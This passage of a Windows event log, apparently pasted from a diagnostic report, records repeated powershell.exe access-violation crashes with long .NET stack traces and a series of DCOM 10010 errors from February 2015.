   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()
 
Error: (02/21/2015 10:37:50 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.3.9600.16384, time stamp: 0x52158733
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x035092a0
Faulting process id: 0xf3c
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3
Faulting package full name: powershell.exe4
Faulting package-relative application ID: powershell.exe5
 
Error: (02/21/2015 10:37:50 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()
 
 
System errors:
=============
Error: (02/21/2015 10:42:55 PM) (Source: DCOM) (EventID: 10010) (User: Dorothy)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (02/21/2015 10:42:13 PM) (Source: DCOM) (EventID: 10010) (User: Dorothy)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (02/21/2015 10:40:13 PM) (Source: DCOM) (EventID: 10010) (User: Dorothy)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (02/21/2015 10:39:30 PM) (Source: DCOM) (EventID: 10010) (User: Dorothy)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (02/21/2015 10:38:47 PM) (Source: DCOM) (EventID: 10010) (User: Dorothy)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (02/21/2015 10:36:54 PM) (Source: DCOM) (EventID: 10010) (User: Dorothy)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (02/21/2015 10:36:07 PM) (Source: DCOM) (EventID: 10010) (User: Dorothy)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (02/21/2015 10:35:25 PM) (Source: DCOM) (EventID: 10010) (User: Dorothy)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (02/21/2015 10:34:38 PM) (Source: DCOM) (EventID: 10010) (User: Dorothy)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (02/21/2015 10:32:39 PM) (Source: DCOM) (EventID: 10010) (User: Dorothy)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
 
Microsoft Office Sessions:
=========================
Error: (02/21/2015 10:40:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: powershell.exe6.3.9600.1638452158733unknown0.0.0.000000000c0000005033c92b813f401d04e59b4ea3f5eC:\WINDOWS\syswow64\windowspowershell\v1.0\powershell.exeunknownf8b04196-ba4c-11e4-bef0-089e013a632b
 
Error: (02/21/2015 10:40:48 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()
 
Error: (02/21/2015 10:40:35 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: powershell.exe6.3.9600.1638452158733unknown0.0.0.000000000c0000005033878b0f0c01d04e59ad2f98abC:\WINDOWS\syswow64\windowspowershell\v1.0\powershell.exeunknownf0be6a1c-ba4c-11e4-bef0-089e013a632b
 
Error: (02/21/2015 10:40:35 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
